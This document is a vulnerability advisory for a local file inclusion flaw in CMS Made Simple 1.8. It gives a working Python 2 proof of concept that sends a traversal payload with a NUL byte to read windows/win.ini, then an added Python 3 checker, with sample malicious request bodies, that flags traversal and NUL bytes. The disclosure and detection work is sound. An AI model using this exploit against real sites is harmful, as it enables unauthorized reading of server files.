Software: CMS Made Simple 1.8
Vulnerability: Local File Inclusion
Tested On: Windows Vista + XAMPP
Date: 7/11/2010
Description
A vulnerability in CMS Made Simple 1.8 can be exploited to include arbitrary files.
Proof of Concept
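# Python 2 script (httplib and the print statement are Python 2 only).
import httplib, urllib

host = 'localhost'
path = '/cmsms'

# Directory traversal up to the drive root, then the file to include.
# The trailing NUL byte truncates any suffix the application appends to the path.
lfi = '../' * 32 + 'windows/win.ini\x00'

# The payload is sent as the default_cms_lang POST parameter.
c = httplib.HTTPConnection(host)
c.request('POST', path + '/admin/addbookmark.php',
          urllib.urlencode({ 'default_cms_lang': lfi }),
          { 'Content-type': 'application/x-www-form-urlencoded' })
r = c.getresponse()

# Print the status line and the response body.
print r.status, r.reason
print r.read()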
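The following Python 3 check is an added example, not part of the original advisory or of CMS Made Simple. It inspects a form-encoded POST body for the two traits the proof of concept relies on (path traversal and a NUL byte) and applies an allow-list to `default_cms_lang`. The locale shape `xx_XX`, the helper names and the sample bodies are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Assumed locale shape (e.g. en_US); adjust to the locales actually installed.
LANG_RE = re.compile(r"[a-z]{2}_[A-Z]{2}")
# ".." as a whole path segment, with either slash style (Windows or POSIX).
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
MAX_DECODE_ROUNDS = 3  # extra rounds catch double or triple URL-encoding


def fully_decode(value):
    """Percent-decode repeatedly so %252e%252e%252f is seen as ../"""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_safe_lang(value):
    """Allow-list check: accept only values shaped like a locale code."""
    return LANG_RE.fullmatch(value) is not None


def inspect_form_body(body, lang_param="default_cms_lang"):
    """Return (parameter, reason) findings for a urlencoded POST body."""
    findings = []
    for name, raw in parse_qsl(body, keep_blank_values=True):
        value = fully_decode(raw)
        if "\x00" in value:
            findings.append((name, "nul-byte"))
        if TRAVERSAL_RE.search(value):
            findings.append((name, "path-traversal"))
        if name == lang_param and not is_safe_lang(value):
            findings.append((name, "not-a-locale"))
    return findings


# Constructed sample bodies (not captured traffic).
SAMPLES = [
    "default_cms_lang=en_US&title=Home",
    "default_cms_lang=..%2F..%2Fwindows%2Fwin.ini%00",
    "default_cms_lang=%252e%252e%255cboot.ini",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(body, "->", inspect_form_body(body))
```

Because the payload travels in the POST body, a check like this has to run where the body is visible (application code, a reverse proxy or a WAF rule); standard access logs record only the request line.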